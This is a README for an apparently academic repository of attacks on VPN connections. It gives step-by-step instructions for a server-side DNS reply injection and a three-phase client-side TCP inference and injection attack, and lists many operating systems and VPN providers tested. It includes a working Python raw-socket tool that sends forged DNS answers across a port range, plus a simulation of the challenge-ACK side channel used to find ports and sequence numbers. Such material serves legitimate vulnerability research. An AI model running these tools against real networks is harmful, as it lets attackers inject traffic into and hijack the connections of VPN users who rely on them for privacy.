# vpn-attacks

##### Attack Machine Environment

* C++
* libtins (http://libtins.github.io/download/)

## Server-side attack

#### Requirements

* VPN client connected to a VPN server
* Attack machine sitting somewhere between the VPN server and the client, forwarding all traffic between the two

***Note:*** The full virtual test environment setup for the server-side attack is detailed in the README within the `virt-lab` folder.

#### Running the DNS Attack Script

1. Change to the UDP/DNS attack folder: `cd server-side-attack/dns-sside/full_scan`
2. Compile the attack script: `make`
3. Check that the VPN server has a conntrack entry for some VPN client's DNS lookup (on the vpn-server VM): `sudo conntrack -L | grep udp`
4. Try to inject from the attack router: `sudo ./uud_send <dns_server_ip> <src_port (53)> <vpn_server_ip> <start_port> <end_port>`

The injection sends forged replies that appear to come from `<dns_server_ip>:<src_port>` to every port in `<start_port>`..`<end_port>` on `<vpn_server_ip>`; the conntrack entry from step 3 is what lets the reply that lands on the right port be translated and forwarded into the tunnel, so without such an entry there is nothing to hit.

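The forged reply behind step 4 is worth seeing in bytes. The following is an added illustration, not the repository's `uud_send` code: a Python builder for a spoofed UDP/DNS answer with valid IP and UDP checksums, one packet per candidate port, a parser that validates the packets offline, and a raw-socket sender for use on the attack router. The DNS transaction ID, query name and answer address are parameters the real tool would have to guess or learn; the values in the usage and test are constructed.

```python
import socket
import struct
import sys


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words (IPv4 and UDP share it)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_dns_answer(txid: int, qname: str, answer_ip: str, ttl: int = 60) -> bytes:
    """Minimal DNS response: the A question echoed back plus one A record."""
    labels = b"".join(bytes([len(p)]) + p.encode() for p in qname.rstrip(".").split("."))
    question = labels + b"\x00" + struct.pack("!HH", 1, 1)            # QTYPE=A, QCLASS=IN
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)          # QR=1, RD, RA, NOERROR
    # 0xC00C is a compression pointer back to the name inside the question (offset 12)
    answer = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + socket.inet_aton(answer_ip)
    return header + question + answer


def build_udp(src_ip: str, dst_ip: str, sport: int, dport: int, payload: bytes) -> bytes:
    """UDP header whose checksum covers the IPv4 pseudo-header, as the receiver expects."""
    length = 8 + len(payload)
    pseudo = socket.inet_aton(src_ip) + socket.inet_aton(dst_ip) + struct.pack("!BBH", 0, 17, length)
    csum = inet_checksum(pseudo + struct.pack("!HHHH", sport, dport, length, 0) + payload)
    return struct.pack("!HHHH", sport, dport, length, csum or 0xFFFF) + payload


def build_ipv4(src_ip: str, dst_ip: str, payload: bytes, ident: int = 0, ttl: int = 64) -> bytes:
    """IPv4 header (protocol 17 = UDP) around `payload`, with the header checksum filled in."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), ident, 0, ttl, 17, 0,
                      socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    hdr = hdr[:10] + struct.pack("!H", inet_checksum(hdr)) + hdr[12:]
    return hdr + payload


def spoofed_replies(dns_server_ip, vpn_server_ip, start_port, end_port, txid, qname, answer_ip):
    """Yield (dst_port, packet): one forged reply from dns_server_ip:53 per port in the range."""
    dns = build_dns_answer(txid, qname, answer_ip)
    for port in range(start_port, end_port + 1):
        yield port, build_ipv4(dns_server_ip, vpn_server_ip,
                               build_udp(dns_server_ip, vpn_server_ip, 53, port, dns), ident=port)


def parse_udp_packet(pkt: bytes) -> dict:
    """Decode a packet from spoofed_replies() and validate both checksums (0 means valid)."""
    ihl = (pkt[0] & 0x0F) * 4
    udp = pkt[ihl:]
    sport, dport, ulen, _ = struct.unpack("!HHHH", udp[:8])
    pseudo = pkt[12:20] + struct.pack("!BBH", 0, 17, ulen)
    return {
        "src": socket.inet_ntoa(pkt[12:16]), "dst": socket.inet_ntoa(pkt[16:20]),
        "sport": sport, "dport": dport, "txid": struct.unpack("!H", udp[8:10])[0],
        "ip_checksum_ok": inet_checksum(pkt[:ihl]) == 0,
        "udp_checksum_ok": inet_checksum(pseudo + udp) == 0,
    }


def send_scan(dns_server_ip, vpn_server_ip, start_port, end_port, txid, qname, answer_ip) -> int:
    """Put every forged reply on the wire (needs root / CAP_NET_RAW); returns the count sent."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)   # we supply the IP header
    sent = 0
    for _, pkt in spoofed_replies(dns_server_ip, vpn_server_ip, start_port, end_port,
                                  txid, qname, answer_ip):
        sock.sendto(pkt, (vpn_server_ip, 0))
        sent += 1
    sock.close()
    return sent


if __name__ == "__main__":
    # argument order mirrors uud_send, plus the forged answer; all values are the operator's
    a = sys.argv[1:]
    if len(a) != 7:
        sys.exit("usage: dns_spoof.py <dns_server_ip> <vpn_server_ip> <start_port> <end_port> "
                 "<txid> <qname> <answer_ip>")
    print(send_scan(a[0], a[1], int(a[2]), int(a[3]), int(a[4], 0), a[5], a[6]), "packets sent")
```

The port loop is the whole scan: each packet differs only in its UDP destination port and IP ID, and whichever one matches the conntrack entry's translated port is the one that reaches the client.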
## Client-side attack

#### Requirements

* VPN client connected to a VPN server
* Reverse path filtering disabled on the VPN client machine, so that packets addressed to the tunnel's private address are accepted when they arrive on the Wi-Fi interface (`net.ipv4.conf.all.rp_filter=0` on Linux)
* Attack machine acting as the local network gateway for the victim (VPN client) machine, using hostapd, create_ap, or Ubuntu's built-in hotspot feature

#### Running the Full Attack Script

* Rebuild all the attack scripts: `./rebuild_all.sh`
* `cd full_attack`
* Change the `attack.sh` vars to appropriate values
* `sh attack.sh <remote_ip>`

***Note:*** `remote_ip` specifies the IP address of the HTTP site.

#### Testing Individual Attack Phases

##### Phase 1 - Infer victim's private address

* `cd first_phase`
* `python3 send.py <victim_public_ip> <private_ip_range>`

***Note:*** `private_ip_range` specifies a `/24` network such as `10.7.7.0`.

##### Phase 2 - Infer the port being used to talk to some remote address

* `cd sec_phase`
* Edit `send.cpp` to use the correct MAC addresses
* `g++ send.cpp -o send -ltins`
* `./send <remote_ip> <remote_port> <victim_wlan_ip> <victim_priv_ip>`

***Note:*** `<remote_ip>` is the address we want to check whether the client is connected to, and `<remote_port>` is almost always 80 or 443. `<victim_wlan_ip>` is the public address of the victim and `<victim_priv_ip>` was found in phase 1. If the script is not sniffing any challenge ACKs, edit `send.cpp` to uncomment the `cout` line that prints the remainder, and check whether the size of the encrypted packets has changed slightly on this system.

##### Phase 3 - Infer exact sequence number and in-window ack

* `cd third_phase`
* Edit `send.cpp` to use the correct MAC addresses
* `g++ send.cpp -o send -ltins`
* `./send <remote_ip> <remote_port> <victim_wlan_ip> <victim_priv_ip> <victim_port>`

***Note:*** `<victim_port>` was found in phase 2. This script currently just injects a hardcoded string into the TCP connection but could easily be modified.

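Phases 2 and 3 both depend on one oracle: a spoofed segment delivered to the victim's tunnel address either makes the victim emit a challenge ACK through the tunnel or it does not, and the attacker can only see the encrypted packet's size. The simulation below is an added example, not the project's `send.cpp`. It models a single established connection according to RFC 5961 (a SYN on a synchronized connection and an in-window but inexact RST both draw a challenge ACK; an exact-match RST resets; out-of-window segments are dropped) and RFC 793 (a closed port answers a SYN with a bare RST and ignores a RST), then runs the phase-2 port search and the first half of phase 3, a stepped RST scan for an in-window sequence number. `TUNNEL_OVERHEAD`, the 40/52-byte inner sizes and the connection parameters are constructed assumptions; refining to the exact sequence number, inferring the in-window ACK, and the kernel's challenge-ACK rate limit are not modelled.

```python
from dataclasses import dataclass

# Constructed tunnel constants: assumptions for the simulation, not measurements of any VPN.
TUNNEL_OVERHEAD = 57       # bytes the tunnel wraps around each inner packet
BARE_RST_LEN = 40          # IPv4 + TCP header, no options: what a closed port answers a SYN with
CHALLENGE_ACK_LEN = 52     # IPv4 + TCP header + 12-byte timestamp option on the live socket
MODULUS = 1 << 32          # TCP sequence space


def encrypted_len(inner_len: int) -> int:
    """Size of an inner packet as the attacker sees it on the wire after tunnelling."""
    return inner_len + TUNNEL_OVERHEAD


def is_challenge_ack(observed_len: int) -> bool:
    """Size-only classification of a sniffed encrypted packet; this is the check that the
    phase-2 note's 'remainder' output recalibrates when a system's encrypted sizes differ."""
    return observed_len == encrypted_len(CHALLENGE_ACK_LEN)


@dataclass
class SimulatedVictim:
    """One established connection behind the tunnel, answering per RFC 5961 / RFC 793."""
    remote_ip: str
    remote_port: int
    local_ip: str        # the tunnel's private address (the phase-1 result)
    local_port: int
    rcv_nxt: int
    rcv_wnd: int
    alive: bool = True

    def probe(self, src_ip, sport, dst_ip, dport, flags, seq) -> int:
        """Deliver one spoofed segment; return the encrypted reply size, 0 if nothing leaves."""
        if dst_ip != self.local_ip:
            return 0
        on_conn = (self.alive and src_ip == self.remote_ip
                   and sport == self.remote_port and dport == self.local_port)
        if not on_conn:
            # RFC 793: a RST to a closed port is dropped; anything else draws a bare RST
            return 0 if "R" in flags else encrypted_len(BARE_RST_LEN)
        if "S" in flags:
            # RFC 5961 sec 4: a SYN in a synchronized state draws a challenge ACK, seq ignored
            return encrypted_len(CHALLENGE_ACK_LEN)
        if "R" in flags:
            offset = (seq - self.rcv_nxt) % MODULUS
            if offset == 0:            # exact match: the connection is torn down, silently
                self.alive = False
                return 0
            if offset < self.rcv_wnd:  # RFC 5961 sec 3.2: in-window but inexact RST
                return encrypted_len(CHALLENGE_ACK_LEN)
        return 0


def find_port(victim, remote_ip, remote_port, victim_priv_ip, ports):
    """Phase 2: SYN-probe candidate ports; only the live 4-tuple answers with a challenge ACK."""
    return [p for p in ports
            if is_challenge_ack(victim.probe(remote_ip, remote_port, victim_priv_ip, p, "S", 0))]


def find_in_window_seq(victim, remote_ip, remote_port, victim_priv_ip, port, step):
    """Phase 3, first half: RST probes `step` apart across the whole sequence space.
    `step` must not exceed the receive window or a window can be skipped; a probe that hit
    rcv_nxt exactly would reset the connection, which the real attack has to avoid."""
    for seq in range(0, MODULUS, step):
        if is_challenge_ack(victim.probe(remote_ip, remote_port, victim_priv_ip, port, "R", seq)):
            return seq
    return None


if __name__ == "__main__":
    # constructed scenario: the victim talks to 93.184.216.34:443 from its tunnel address
    v = SimulatedVictim("93.184.216.34", 443, "10.7.7.3", 51312, rcv_nxt=0x8A3F1C25, rcv_wnd=1 << 20)
    print("ports:", find_port(v, "93.184.216.34", 443, "10.7.7.3", range(51300, 51320)))
    print("in-window seq:", hex(find_in_window_seq(v, "93.184.216.34", 443, "10.7.7.3", 51312, 1 << 20)))
```

The two searches share nothing but `is_challenge_ack`, which is the point: once the encrypted size of a challenge ACK is known for a given client, every later phase reduces to sending a probe and watching for one packet of that size. If a VPN client adds a different amount of overhead, the expected length shifts and every probe looks silent, which is the situation the `remainder` printout in phase 2 is there to diagnose.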
## Tested operating systems, applications, and VPN providers

##### Operating systems

* iOS (up to v12.4.1)
* Android (up to v10)
* Ubuntu (v20.04)
* Fedora (v31)
* Debian (v10.2)
* Arch (v2019.05)
* Manjaro (v18.1.1)
* MX Linux (v19)
* Slackware (v14.2)
* Void Linux (rolling)
* Devuan (v2.1)
* Deepin (v15.11)
* FreeBSD (v12.1)
* OpenBSD (v6.6)
* macOS (Sierra, High Sierra, Mojave)

##### VPN Providers and applications

* Mullvad
* PIA
* ProtonVPN
* PureVPN
* FrootVPN
* VyperVPN
* ExpressVPN
* SlickVPN
* TunnelBear
* SoftEther
* Hotspot Shield
* Betternet
* SecurityKiss
* Spotflux
* CyberGhost
* Surfshark
* IPVanish
* TorGuard
* StrongVPN
* Wang VPN
* Pupa VPN
* Thunder VPN
* Galaxy VPN
* SecureVPN
* Panda VPN Pro
* NordVPN
* SuperVPN Free
* VPN Free
* Wuma VPN PRO
* Xiaoming VPN
* SurfVPN
* BlueWhale VPN
* Orbot
* Lantern
* Psiphon

#### Source Code License

Copyright (C) 2018-2021 Breakpointing Bad unless otherwise noted.
Where another license is included, please follow the licensing and
redistribution clauses of the author.

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.